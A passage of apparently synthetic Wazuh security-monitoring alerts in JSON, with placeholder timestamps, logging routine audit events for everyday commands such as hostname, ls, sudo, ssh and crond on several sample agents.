/usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: 